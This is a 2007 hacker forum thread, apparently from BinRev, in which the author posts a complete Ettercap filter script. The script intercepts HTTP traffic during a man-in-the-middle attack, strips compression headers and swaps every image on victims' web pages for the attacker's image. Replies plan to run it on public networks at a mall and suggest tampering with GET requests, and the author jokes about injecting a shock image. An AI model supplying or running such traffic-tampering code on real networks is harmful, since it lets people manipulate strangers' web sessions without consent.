Jump to content


Photo
* * * * - 1 votes

Ettercap Image Replacemnt Filters


  • Please log in to reply
4 replies to this topic

#1 Irongeek

Irongeek

    Dangerous free thinker

  • Agents of the Revolution
  • 1,516 posts
  • Location:Louisville, Ky more or less

Posted 18 March 2007 - 09:51 PM

Way back when I wrote a web site image replacement filter for use with Ettercap.

http://www.irongeek..../ettercapfilter

It was very hit or miss with it's image replacement. Jon.dmml emailed me and showed me a better way. The page above has been updated, but just in case here is the code:

#############################################################################                                                                          ##  Jolly Pwned -- ig.filter -- filter source file                          ##                                                                          ##  By Irongeek. based on code from ALoR & NaGA                             ##  Along with some help from Kev and jon.dmml                              ##  [url="http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833"]http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833[/url]              ##                                                                          ##  This program is free software; you can redistribute it and/or modify    ##  it under the terms of the GNU General Public License as published by    ##  the Free Software Foundation; either version 2 of the License, or       ##  (at your option) any later version.                                     ##                                                                          #############################################################################if (ip.proto == TCP && tcp.dst == 80) {   if (search(DATA.data, "Accept-Encoding")) {      replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string      msg("zapped Accept-Encoding!\n");   }}if (ip.proto == TCP && tcp.src == 80) {   replace("src=", "src=\"http://www.irongeek.com/images/jollypwn.png\" ");   replace("SRC=", "src=\"http://www.irongeek.com/images/jollypwn.png\" ");   replace("src =", "src=\"http://www.irongeek.com/images/jollypwn.png\" ");   replace("SRC =", "src=\"http://www.irongeek.com/images/jollypwn.png\" ");   msg("Filter Ran.\n");}

Tubgirl anyone?

#2 livinded

livinded

    Dangerous free thinker

  • Agents of the Revolution
  • 1,942 posts
  • Location:~/

Posted 18 March 2007 - 11:39 PM

Gonna have to give this a try on my next hacking trip to the mall. Although I think changing the GET request would be a little more fun.

#3 dalejrrocks

dalejrrocks

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 472 posts
  • Location:Alabama

Posted 18 March 2007 - 11:51 PM

Nice, gonna have to try this one. The last one didn't work too well with me.

#4 jabzor

jabzor

    hax?

  • Agents of the Revolution
  • 1,146 posts
  • Country:
  • Gender:Male
  • Location:Northern Elbonia, fighting the lefties

Posted 19 March 2007 - 05:32 AM

Wow does ettercap filtering ever suck under Windows, I'll try this in nix later when I get a chance. ;)

#5 Irongeek

Irongeek

    Dangerous free thinker

  • Agents of the Revolution
  • 1,516 posts
  • Location:Louisville, Ky more or less

Posted 19 March 2007 - 07:17 AM

Wow does ettercap filtering ever suck under Windows, I'll try this in nix later when I get a chance. ;)



Yeah, I tested under Linux and it worked fine, but the Windows port just crashed on me.




BinRev is hosted by the great people at Lunarpages!